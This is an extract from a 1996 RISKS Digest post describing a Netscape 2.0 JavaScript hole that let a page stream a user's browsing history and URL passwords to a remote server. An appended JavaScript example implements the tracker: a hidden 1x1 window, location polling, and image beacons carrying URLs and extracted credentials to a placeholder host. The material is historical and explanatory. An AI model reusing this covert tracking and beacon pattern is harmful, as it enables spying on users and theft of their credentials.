Extract from: RISKS Digest 17, Number 79

Date:    Fri, 23 Feb 96 10:03:49 -0500
From:    John Robert LoVerso <loverso@schooner.com>
Subject: Netscape Navigator 2.0 exposes user's browsing history

While riding home this past Wednesday (on my accident-free commuter-rail line), I came up with an approach to utilize the JavaScript "feature" of Netscape 2.0 to track a user's browsing actions. The tracking happens in real time with the user's browser dutifully sending results back to a remote server, starting from the time the user visits a page with the devious JavaScript embedded in it. It can thus sniff any passwords or keys the user might use in a URL.

My example version runs in a browser window that the user can see. I'm only demonstrating the vulnerability. Practically, the window can be made so small as to be invisible to the casual user. It also helps that a user isn't even informed when the HTML page they just loaded has some JavaScript code within it.

Think about Netscape's new JavaScript-laden home page. The default action on startup of Netscape 2.0 is to go to that page. It could easily start off tracking your browsing actions. With the new on-line frontier being driven by advertising, the value of such a log is immense. Of course, if Netscape really wanted to do something like this, they could embed all sorts of things directly in their browser. Naturally they don't, but this is something that people often clamor about (e.g., the recent Microsoft Word and the never-ending AOL controversies).

As it stands, with Netscape 2.0 you cannot disable JavaScript. You can disable Java. This is an interesting choice on their part, since at least there has been a significant effort on the part of many people to justify Java's claim of security and safeness. Thousands of people have pored over the code and specifications.

But, JavaScript and Java are totally different things. They share common names and syntax, but they don't share implementations. One is a byte-compiled language executing in a restrictive state machine, the other is an interpreted scripting language with vastly different properties. Compared with the thousands of people who have looked at the source to Java, no one has seen JavaScript. Its specifications are defined by the implementation, which to date is solely Netscape 2.0. We're told it is "Secure. Cannot write to hard disk", which is how Java is also described. Is there enough commonality for such a comparison? It is hard to determine that a program is safe or secure after studying it. It is impossible without.

My particular history tracker is the third (or fourth?) way to steal private data from a user via JavaScript. It stands out as the first one that does it in real time, reporting history as the user is browsing. In an interesting bit of irony, as I was writing the code to exploit this hole, a news article from someone at Netscape appeared noting how they had fixed 2.0 during the "beta-test" period to avoid the latest of the history-stealing approaches.

As it stands, JavaScript adds a viral element to HTML. I'm not sure why Netscape doesn't ship JavaScript disabled by default or why they don't alarm the user before it starts to execute, or opens up new windows.

Finally, it is interesting to note that the Netscape Navigator already has the building blocks to block the execution of any JavaScript (or Java) code that doesn't come digitally signed from some trusted source. This would help provide a real safeguard against the types of attack downloaded code opens up.

My JavaScript examples are at http://www.schooner.com/~loverso/javascript/.

John Robert LoVerso
OSF Research Institute

Added note:

Did you ever try to teach someone the importance of keeping their ATM PIN secret, only to find that they never lock the doors to their house? A non-empty subset of the hosts who have visited my JavaScript "tracker" page run an X server with no access control enabled.
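The following is an added example, not code from LoVerso's post or from his schooner.com pages. It models the mechanism the post describes: a script that opens a window too small to notice, polls that window's location, and reports each new URL to a tracker host by loading an image whose URL carries the history entry, so that credentials typed into a URL go along with it. The tracker host, the example session and the 1x1 window parameters are all placeholders. The polling and beacon logic is separated from the browser glue so it can be exercised outside a browser; in a current browser the cross-window location read is blocked by the same-origin policy, and the example shows how the tracker sees that.

```javascript
// Added example (not from LoVerso's post): a model of the Netscape 2.0
// history-tracker mechanism. Tracker host and sample session are placeholders.

// Build the beacon URL: the visited URL travels in a query string, so anything
// in the URL (including http://user:pass@host/ credentials) reaches the tracker.
function beaconUrl(trackerBase, visitedUrl) {
  return trackerBase + '/track?u=' + encodeURIComponent(visitedUrl);
}

// Credentials embedded in a URL that the beacon would carry along (null if none).
function leakedCredentials(visitedUrl) {
  const u = new URL(visitedUrl);
  return u.username ? { user: u.username, pass: u.password } : null;
}

// Polling tracker: readLocation returns the watched window's current URL;
// sendBeacon is how the report leaves the browser (an <img> load in 1996).
function makeTracker(trackerBase, sendBeacon) {
  let last = null;
  const reported = [];
  return {
    poll(readLocation) {
      let url;
      try {
        url = readLocation();
      } catch (e) {
        // Modern browsers throw here for a cross-origin window (same-origin policy).
        return { blocked: true, reason: String(e.message) };
      }
      if (url === last) return { changed: false };
      last = url;
      reported.push(url);
      sendBeacon(beaconUrl(trackerBase, url));
      return { changed: true, url };
    },
    reported() {
      return reported.slice();
    },
  };
}

// Drive the tracker over a constructed sequence of locations and return the
// beacons a tracker host would receive (duplicates of the last URL are skipped).
function simulate(trackerBase, locations) {
  const beacons = [];
  const tracker = makeTracker(trackerBase, (b) => beacons.push(b));
  for (const loc of locations) tracker.poll(() => loc);
  return beacons;
}

// Browser glue (only meaningful in a browser): open a 1x1 window the user will
// not notice and poll its location every half second.
function installInBrowser(trackerBase) {
  const spy = window.open('about:blank', 'spy', 'width=1,height=1,left=0,top=0');
  const tracker = makeTracker(trackerBase, (b) => { new Image().src = b; });
  return setInterval(() => tracker.poll(() => spy.location.href), 500);
}

if (typeof window === 'undefined') {
  // Constructed sample browsing session (placeholder hosts).
  const session = [
    'http://www.example.com/',
    'http://www.example.com/',
    'http://alice:s3cret@intranet.example.com/reports',
  ];
  for (const b of simulate('http://tracker.example.net', session)) console.log(b);
  console.log(leakedCredentials(session[2]));
}
```

Running it under Node prints the two beacons the tracker would receive for the constructed session (the repeated URL is reported once) and the username and password lifted from the third URL; the `blocked` branch is what a present-day browser would produce on the cross-origin read, which is the safeguard Netscape 2.0 lacked.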